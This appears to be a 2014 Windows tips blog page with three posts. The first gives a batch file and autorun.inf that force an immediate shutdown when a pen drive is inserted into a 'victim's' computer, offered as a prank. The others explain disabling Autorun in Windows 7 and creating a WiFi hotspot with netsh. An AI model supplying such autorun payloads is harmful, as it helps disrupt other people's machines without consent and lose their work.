Showing posts with label jugaad. Show all posts
Showing posts with label jugaad. Show all posts

Wednesday, 15 October 2014

Shutdown Any Computer Using Pen Drive




Hello Winlinware readers, Welcome...!!!

Here is a fresh trick to shutdown any computer at the moment we insert pen drive into it.
You can use this trick to tease your friend's or office computers.

Here we go...!!!

Steps To Follow:

1) Open notepad and paste this code in it :

@echo off
shutdown -s -t 00


2) Save the file as winlinware.bat

3) Open a new notepad and paste this code in it:

[autorun]
Open=winlinware.bat
Action=Mouse Disable


4) Save it as autorun.inf

5) Copy both the files to the pen drive and you are done. Now whenever that pen drive is inserted, victim's system will go down.

Note: Make sure that the autorun option is enabled in victim's computer, click here to know how.

Note: There is only one way to stop this i.e. by disabling autorun option and format the pen drive or delete those two files, click here to know how.

Disable Autorun Feature In Windows 7




Hey Guys, welcome...!!!


Whenever we insert any removable drive, windows autorun feature gives us several options to open that device as we want.
Most of the times we don't want any popup to come because of autorun. For that purpose we can disable autorun feature in our windows 7.

Steps To Follow:

1) Press Windows key + R to launch the Run dialogue box. Here you need to enter Gpedit.msc and then click on OK.


2) You will now see the Local Group Policy Editor on your screen.


3) On the Local Group Policy Editor, you need to click on Computer Configuration > Administrative Templates> Windows Components. Under Windows Components, you will see AutoPlay Policies.



4) When you click on AutoPlay Policies on the left, you will also see an option that says Turn off AutoPlay on the right. Click on it and then choose the Edit option.


5) On the Turn off AutoPlay window, you need to select the Enabled option


6) Click on the Apply and OK buttons and to finish the disable Autorun feature on Windows 7. Also make sure you select the All drives option as shown on the screenshot of step no.5 in order to disable the Autorun feature on all drives


Source: http://www.besthacking.in/2014/02/how-to-disable-autorun-in-windows-7.html

Wednesday, 8 October 2014

Turn Your Laptop Into WiFi Hotspot




Hey Folks, welcome again.

As per the request from some users, we are sharing this trick to convert your windows machine into a Hotspot (Wi-Fi).
After doing this, you can share the internet connection over your hotspot (Wi-Fi) also.

Steps To Follow:

1) Open command prompt, make sure you do it using Run as administrator option.
  • Type command prompt in start menu.
  • Right click on command prompt.
  • Select Run as administrator.
2) Check that your system is capable of creating a hotspot or not. Type netsh wlan show drivers on command prompt screen.


3) If yes then type the following commands to set some parameters and enable your hotspot.

  • netsh <hit enter>.
  • wlan <hit enter>.
  • set hostednetwork mode=allow <hit enter>.
  • set hostednetwork ssid=<name of hotspot without spaces> <hit enter>.
  • set hostednetwork key=<password for your hotspot> keyUsage=persistent <hit enter>.
  • exit <hit enter>.
  • netsh wlan start hostednetwork <hit enter>.
*Replace <name of hotspot without spaces> with the name of your hotspot.
*Replace <password for your hotspot> with your password for hotspot.

4) Go to Network and Sharing Center from control panel and you will see your hotspot there as virtual wireless adaptor.

5) For sharing internet over hotspot, 
  • Go to Control Panel, Network & Internet, and Network Connections.
  • Right click on the adaptor that has access to the internet and go to properties.
  • Turn on the option “Allow other network users to connect through this computer’s Internet connection” under Sharing tab. Make sure to pick the enabled Wireless virtual adaptor which is your hotspot as the Home networking connection.



Note: The problem with this trick is that you have to do it all over again after a restart.

If you want to do it in an easy way, you can download some cool software like Virtual Router. :P

Enjoy...!!!